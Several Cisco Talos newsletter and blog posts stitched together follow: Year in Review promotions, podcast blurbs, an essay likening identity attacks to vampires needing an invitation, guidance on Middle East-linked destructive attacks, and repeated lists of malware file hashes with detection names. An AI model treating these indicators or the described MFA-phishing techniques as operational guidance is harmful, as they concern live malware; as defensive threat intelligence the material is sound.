Talos and Splunk researchers are standing by on Reddit to answer your questions about the Year in Review, Top 50 Cybersecurity Threats report, or just about anything else you want to know. It’s halfway over, so post your questions now! 

Year in Review highlights 
In 2025, attackers moved fast, but they also played the long game. This short video highlights the biggest trends from the 2025 Talos Year in Review and what they reveal about where the threat landscape is headed. 

Gravy, glutes, and the Talos Year in Review 
Hazel, Bill, Joe, and Dave discuss the 2025 Year in Review, supported as always by the Turkey Lurkey Man. We also discuss the cyber activity tied to the situation in the Middle East. 

Cybersecurity’s double-header 
With the recent release of the Year in Review and Splunk’s Top 50 Cybersecurity Threats report, Amy, Bill, and Lou break down the most critical trends that shaped the security landscape last year. 

Upcoming events where you can find Talos 

• Botconf 2026 (April 15 – 17) Reims, France 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Example Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe 
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
MD5: aac3165ece2959f39ff98334618d10d9 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe 
Detection Name: W32.Injector:Gen.21ie.1201 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
Example Filename: APQ9305.dll 
Detection Name: Auto.90B145.282358.in02 

SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
MD5: a2cf85d22a54e26794cbc7be16840bb1 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe 
Detection Name: W32.5E6060DF7E-100.SBX.TG 

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe 
Detection Name: Win.Dropper.Miner::95.sbx.tg 

SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
MD5: 41444d7018601b599beac0c60ed1bf83 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js 
Detection Name: W32.38D053135D-95.SBX.TG 

In this episode of Talos Takes, Amy is joined by William Largent (Cisco Talos) and Lou Stella (Splunk) for a "double-header" discussion. With the recent release of the Cisco Talos 2025 Year in Review and the Splunk Top 50 Cybersecurity Threats report, we’re breaking down the most critical trends that shaped the security landscape last year — all based on Cisco telemetry, Talos' original research, and Talos Incident Response engagements.

From the professionalization of ransomware-as-a-service to the persistent challenge of decade-old vulnerabilities, this episode moves beyond the headlines to provide a practical roadmap for defenders. You’ll get tips on how to prioritize your defenses and reduce your attack surface for the year ahead.

View the 2025 Year in Review today.

The Beers with Talos B team (that’s Hazel, Bill, Joe and Dave) break down (sometimes in the literal sense) the 2025 Talos Year in Review which is available now.

The team dives into the biggest cybersecurity trends of the year, including:

• The rapid weaponization of new vulnerabilities
• Why identity abuse showed up everywhere 
• Ransomware trends
• A rise in APT investigations
• What defenders should prioritize heading into the year ahead

Before that, we discuss the cyber activity tied to the situation in the Middle East (full details on our blog).

There’s also an alarming amount of discussion about glutes. And gravy. Listen here:

Download the full 2025 Talos Year in Review today.

The 2025 Talos Year in Review is now available to view online.

The pace and scale of adversary activity in 2025 placed sustained pressure on security teams across industries. As with each annual report, our goal at Talos is to provide the security community with a clear analysis of the tactics, techniques, and procedures that shaped adversary operations, and to help organizations prioritize the actions that reduce exposure and strengthen defenses.

What defined 2025

Three themes emerged consistently across Talos’ threat research, telemetry, and incident response engagements:

1. Exploitation at both extremes

New large-scale vulnerabilities were operationalized almost immediately, but adversaries also continued to exploit CVEs that have been exposed for years. This rapid operationalization of new vulnerabilities reflects a rise in automated exploit development, public proof-of-concept code, and mature adversary coordination.

React2Shell, released in December, ranked first by year’s end only three weeks after disclosure, while a vulnerability disclosed 12 years ago ranked seventh. That range tells a story about organizational technical debt: Long-standing exposure continues to be reliably and successfully exploited.

2. The architecture of trust

In 2025, adversaries focused on the systems that manage authentication, authorization, and device trust.

Attackers who gained access through compromised credentials stealthily extended that access through internal phishing and abuse of identity controls within network infrastructure. Control of identity often meant control of the environment.

3. Targeting centralized systems for more leverage

Threat actors targeted centralized infrastructure, management platforms, and shared frameworks to expand the impact of a single compromise.

Approximately 25% of the vulnerabilities in the Top 100 targeted list affected widely used frameworks and libraries that are embedded deep within the software stack. Because these components underpin applications and network appliances across vendors, a single CVE can create mass exploitation potential across industries. Compromising these shared foundations enabled lateral movement across environments. 

Read the full report

View the full report online (it’s not gated and never will be) to see where attackers are gaining ground, and how to disrupt their playbook. 

Read the 2025 Cisco Talos Year in Review

Download now

Welcome to this week’s edition of the Threat Source newsletter. 

I found myself watching the Oscars ceremony in its entirety for the first time in a few years. I’m in the U.K., so I watched it the following day. With next week’s Year in Review launch looming and several pieces of content still to finalise, two hours of sleep didn’t seem like the best idea. 

My overriding thought from the ceremony was: How much poorer would this have been without “Sinners?” 

A purely original film (deservedly the winner of Best Original Screenplay), “Sinners” is set in 1932 in the Jim Crow-era Mississippi Delta. The storytelling is rooted in survival, connections to the past and the future, and cultural identity. And the music. Oh man, the music. 

It is also (mild spoiler warning) a vampire movie. 

Under the direction and quill of Ryan Coogler, the vampires take on an identity I haven’t seen before — they’re colonists. Some of them belong to the KKK. And they occasionally jig. 

In “Sinners,” they feed on vitality they can’t generate themselves. They circle a juke joint run by twin brothers Smoke and Stack, both played by (now Oscar winner) Michael B. Jordan in performances(emphasis on the plural) so clever and distinct you could almost believe they were played by different actors. 

My husband insists he enjoyed the film right up until the vampires appeared. After that, he says, it became less interesting. 

He is, of course, terribly and demonstrably wrong. 

Vampire stories are awesome. And they come with generally well-agreed rules: 

• They despise garlic.
• They’re not keen on fire or stakes through the heart.
• They have to be invited in.

Cue the perilous segue to a security topic… 

In our upcoming 2025 Talos Year in Review, attacks on identity emerged as the dominant theme across multiple vectors. Attackers are not so much trying to batter down doors with noisy exploits. Increasingly, they’re looking to be invited in as a recognisable user. And once inside, their goal is to operate as if they own the place.  

Most organisations have boundaries. Segmentation. Authentication. But when consent is manipulated (e.g., through social engineering), the system can authorise the intrusion itself. 

One of the most common techniques we see involves attackers persuading victims to read out their multi-factor authentication request code in real time, often over the phone, posing as IT support or a trusted vendor. In other cases, adversary-in-the-middle phishing kits proxy the legitimate login page and capture the one-time code as it’s entered. 

The code is valid. 

The authentication succeeds. 

The session is issued. 

In 2025, nearly a third of MFA spray attacks targeted identity access management (IAM) applications. Add to that a 178% surge in fraudulent device registration events, and the trend is clear: Attackers are targeting the mechanisms that issue invitations in the first place. 

“We talkin’ numbers now. And numbers always gotta be in conversation with each other.” - Smoke

In vampire mythology, the barrier holds until someone inside grants entry. In cybersecurity, the same principle applies. Access is increasingly granted, not forced. 

If you want to understand how measurable that shift has become, our 2025 Year in Review will be available on Monday on the Talos blog.

The one big thing 

Late on Friday, Cisco Talos updated our blog on the developing situation in the Middle East. Talos assesses that the recent cyber attack on the medical equipment manufacturing firm, Stryker, likely represents an opportunistic compromise rather than a systematic shift toward targeting the health care sector specifically. Nevertheless, the broader threat landscape remains elevated due to ongoing military operations in Iran, necessitating that all organizations increase vigilance and strengthen their defensive capabilities against destructive cyber activity. 

Why do I care? 

Destructive malware, often leveraged by Iranian threat actors, can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Disruptive cyber attacks against organizations in a target country may unintentionally spill over to organizations in other countries. The broader threat landscape remains elevated across all sectors amid ongoing military operations in Iran. 

So now what? 

Organizations should increase vigilance and evaluate their capabilities, encompassing planning, preparation, detection, and response for such an event. Defenders should ensure security fundamentals are being adhered to, such as robust patching for known vulnerabilities, visibility into end-of-sale (EOS)/end-of-life (EOL) devices in your network with a plan to upgrade, and requiring multi-factor authentication (MFA) for remote access and on critical services. Patches for critical vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment should be prioritized. Organizations can also implement a patch management program that enables a timely and thorough patching cycle.  

We will update this blog with further developments accordingly.

Top security headlines of the week 

New .NET AOT malware hides code as a black box to evade detection 
This new Ahead-of-Time (AOT) method strips metadata away, turning the code into a black box, which forces experts to rely on manual, native-level tools to see what is actually happening under the hood. (HackRead) 

SideWinder espionage campaign expands across Southeast Asia 
The suspected India-linked threat group targets governments, telecom, and critical infrastructure using spear-phishing, old vulnerabilities, and rapidly rotating infrastructure to maintain persistent access. (Dark Reading) 

Threat actor targeting VPN users in new credential theft campaign 
The campaign started in mid-January, luring individuals looking for VPN software into downloading trojans that have been signed with a legitimate digital certificate to evade detection. (SecurityWeek) 

Sears AI chatbot chats and audio files found exposed online 
A researcher discovered three publicly exposed, unprotected databases containing a total of 3.7M chat logs, audio recordings, and text transcripts of phone calls from 2024 to 2026. (Mashable) 

BeatBanker Android trojan uses silent audio loop to steal crypto 
Most modern phones kill background apps to save battery, but these actors found a clever loophole. The app plays a tiny, five-second audio file on a loop. Your phone thinks it’s an active music player, so it won’t shut the app down. (HackRead) 

Can’t get enough Talos? 

Everyday tools, extraordinary crimes: the ransomware exfiltration playbook 
Attackers use trusted tools for data theft, making traditional detection unreliable. The Exfiltration Framework enables defenders to spot exfiltration by focusing on behavioral signals across endpoints, networks, and cloud environments rather than static tool indicators. 

Transparent COM instrumentation for malware analysis 
Cisco Talos presents DispatchLogger, a new open-source tool that delivers high visibility into late-bound IDispatch COM object interactions via transparent proxy interception. 

It's the B+ Team: Matt Olney returns 
Matt is back to talk with the crew about about the most random things, including TikTok diagnosing us with ADHD, K-Pop Demon Hunters, ransomware in hospitals (the serious bit), attacker use of AI, and why 1999-era tricks are still undefeated. 

Modernizing your threat hunt 
David Bianco joins Amy to explore the evolution of the PEAK Threat Hunting framework and talk through how security teams can modernize their approach to identifying risks before they escalate.

Upcoming events where you can find Talos 

• AI Security & Privacy Conference (March 26) Gaia, Portugal 
• Botconf 2026 (April 15 – 17) Reims, France 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: https_2915b3f8b703eb744fc54c81f4a9c67f.exe  
Detection Name: Win.Worm.Coinminer::1201** 

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974  
MD5: aac3165ece2959f39ff98334618d10d9  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe  
Detection Name: W32.Injector:Gen.21ie.1201 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59  
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
Example Filename: APQ9305.dll  
Detection Name: Auto.90B145.282358.in02 

SHA256: 5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811  
MD5: f3e82419a43220a7a222fc01b7607adc  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811  
Example Filename: Accounts Final-2024 .exe  
Detection Name: Win.Dropper.Suloc::1201** 

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
MD5: 7bdbd180c081fa63ca94f9c22c457376  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe  
Detection Name: Win.Dropper.Miner::95.sbx.tg** 

SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
MD5: 41444d7018601b599beac0c60ed1bf83  
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55 
Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js  
Detection Name: W32.38D053135D-95.SBX.TG